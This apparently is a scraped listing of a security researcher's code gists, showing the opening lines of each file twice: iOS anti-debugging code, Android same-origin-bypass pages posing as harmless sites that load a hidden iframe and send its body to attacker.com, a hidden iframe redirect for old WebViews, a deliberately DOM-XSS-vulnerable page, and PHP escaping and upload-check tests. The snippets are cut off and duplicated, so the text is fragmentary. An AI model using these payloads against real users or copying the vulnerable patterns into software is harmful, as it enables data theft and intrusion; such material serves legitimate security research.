Aung Khant yehgdotnet

## catchredir.m
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>

@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end

## iosdebugdetect.cpp
// Build on OS X with:
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
#import <dlfcn.h>
#import <sys/types.h>
#import <stdio.h>
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
void disable_dbg() {
  ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
  ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
}

## MetasploitSOPBypass.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
			&& spec.getBrowser != "Chrome"
			&& parseFloat(spec.getOSVersion()) < 4.4) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";

## AndroidSOPBypass.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## AndroidSOPTest.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## AndroidWebViewRedirect.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
			parseFloat(spec.getOSVersion()) < 4.2) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";
		iframe.src = "http://attacker.com:8080";
		document.body.appendChild(iframe);

## Numerics.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;


/*
Author: Casey Smith, Twitter: @subTee

## dom-xssed.htm
<html>
    <head>
        <title>DOM XSS vulnerable page</title>
    </head>
    <body>
        <script>

        var l = decodeURI(document.location.toLocaleString().split("?")[1]);
        document.write(l);


## gist:5b7562b46e6da6d05fc5b7ff35163bbb
<?php
$s = $_GET['s'];

echo '<h1>htmlentities</h1>';
echo '<h1'.htmlentities($s,ENT_QUOTES).'>HELLO</h1>';

echo '<h2>htmlspecialchars</h2>';
echo '<h1'.htmlspecialchars($s,ENT_QUOTES).'>HELLO</h1>';


## gist:57ad79a24356461b954e5964271da584
<?php

function validFileType($file){
	if($file && $file['tmp_name'] !=''){
		$ext_allow_type = array('xlsx');
		$ext = pathinfo($file["name"], PATHINFO_EXTENSION);
		echo "Extension is ". $ext."<br>";
		if(in_array($ext, $ext_allow_type) != FALSE) {
			return true;
		}
	// Compile with:
	// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
	#import <Foundation/Foundation.h>
	#import <stdio.h>
	#import <objc/runtime.h>

	@interface UrlConnection : NSObject
	@property (strong) NSString *url;
	- (void)connect;
	@end
	// Build on OS X with:
	// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
	#import <dlfcn.h>
	#import <sys/types.h>
	#import <stdio.h>
	typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
	void disable_dbg() {
	ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
	ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
	}
	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	This is a normal website. Look at these pictures of cats...
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
	&& spec.getBrowser != "Chrome"
	&& parseFloat(spec.getOSVersion()) < 4.4) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	<html><head></head>
	<body>
	This is just a normal website...
	<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
	<script>
	document.getElementById("if").style.visibility="hidden";
	window.open("\u0000javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);
	using System;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;



	/*
	Author: Casey Smith, Twitter: @subTee
	<html>
	<head>
	<title>DOM XSS vulnerable page</title>
	</head>
	<body>
	<script>

	var l = decodeURI(document.location.toLocaleString().split("?")[1]);
	document.write(l);
	<?php
	$s = $_GET['s'];

	echo '<h1>htmlentities</h1>';
	echo '<h1'.htmlentities($s,ENT_QUOTES).'>HELLO</h1>';

	echo '<h2>htmlspecialchars</h2>';
	echo '<h1'.htmlspecialchars($s,ENT_QUOTES).'>HELLO</h1>';
	<?php

	function validFileType($file){
	if($file && $file['tmp_name'] !=''){
	$ext_allow_type = array('xlsx');
	$ext = pathinfo($file["name"], PATHINFO_EXTENSION);
	echo "Extension is ". $ext."<br>";
	if(in_array($ext, $ext_allow_type) != FALSE) {
	return true;
	}